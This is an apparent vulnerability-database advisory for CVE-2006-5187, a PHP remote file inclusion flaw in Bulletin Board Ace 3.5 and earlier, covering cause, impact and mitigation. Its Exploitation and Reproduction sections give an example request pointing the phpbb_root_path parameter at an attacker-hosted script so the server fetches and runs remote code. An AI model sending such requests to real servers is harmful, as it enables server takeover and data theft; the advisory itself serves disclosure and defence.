VYPR
← All advisories
Unrated severityNVD Advisory· Published Oct 10, 2006· Updated Apr 23, 2026

CVE-2006-5187

CVE-2006-5187

Description

PHP remote file inclusion in BBaCE 3.5 and earlier allows arbitrary code execution via the phpbb_root_path parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

PHP remote file inclusion in BBaCE 3.5 and earlier allows arbitrary code execution via the phpbb_root_path parameter.

Vulnerability

Bulletin Board Ace (BBaCE) version 3.5 and earlier contains a PHP remote file inclusion vulnerability in the file includes/functions.php. The script unsafely incorporates a user-supplied value from the phpbb_root_path parameter into a require() or include() statement, allowing an attacker to specify an arbitrary URL. This issue is documented in advisory [1] and exploit code [2].

Exploitation

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable includes/functions.php script with the phpbb_root_path parameter set to the URL of a malicious PHP script hosted on an attacker-controlled server. No authentication is required; the attacker only needs network access to the target server. The exploit code [2] demonstrates the simple request format: http://target/[path]/includes/functions.php?phpbb_root_path=http://evil_script.

Impact

Successful exploitation allows the attacker to execute arbitrary PHP code on the target server with the privileges of the web server process. This can lead to full compromise of the application and potentially the underlying server, including data theft, defacement, or further lateral movement.

Mitigation

No official patch or fixed version has been released for BBaCE 3.5 or earlier. The application appears to be abandoned; users should consider migrating to an alternative forum software. As a temporary workaround, disable the vulnerable script or apply input validation to the phpbb_root_path parameter, though this is not a complete solution.

References
  1. About Secunia Research | Flexera
  2. OffSec’s Exploit Database Archive

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

3
  • Bulletin Board Ace/Bulletin Board Ace3 versions
    cpe:2.3:a:bulletin_board_ace:bulletin_board_ace:*:*:*:*:*:*:*:*+ 2 more
    • cpe:2.3:a:bulletin_board_ace:bulletin_board_ace:*:*:*:*:*:*:*:*range: <=3.5
    • cpe:2.3:a:bulletin_board_ace:bulletin_board_ace:3.4:*:*:*:*:*:*:*
    • (no CPE)range: <=3.5

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input validation in includes/functions.php allows a remote URL supplied via the phpbb_root_path parameter to be used in a PHP file-inclusion call."

Attack vector

An attacker sends an HTTP GET request to `includes/functions.php` with the `phpbb_root_path` parameter set to a URL pointing to an attacker-controlled PHP script. The vulnerable code passes this user-supplied URL directly into a PHP file-inclusion construct, causing the remote script to be fetched and executed on the server. No authentication is required, and the attack works over standard HTTP.

Affected code

The vulnerable file is `includes/functions.php` in BBaCE 3.5 and earlier. The `phpbb_root_path` parameter is taken directly from the request and used to include a remote file without any sanitization.

What the fix does

No patch is included in the bundle. The advisory does not describe a fix; the only remediation is to avoid using the vulnerable version or to manually sanitize the `phpbb_root_path` parameter before it is used in a file-inclusion operation.

Preconditions

  • configThe target must run BBaCE 3.5 or earlier with the vulnerable includes/functions.php accessible.
  • networkNo authentication is required; the attacker only needs network access to the web server.
  • inputThe attacker supplies a URL in the phpbb_root_path parameter pointing to a malicious PHP script.

Reproduction

Send a request to the vulnerable server: `http://site.com/[path]/includes/functions.php?phpbb_root_path=http://[Evil_script]` where `[Evil_script]` is a URL hosting attacker-controlled PHP code. The remote code will be executed on the server.

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.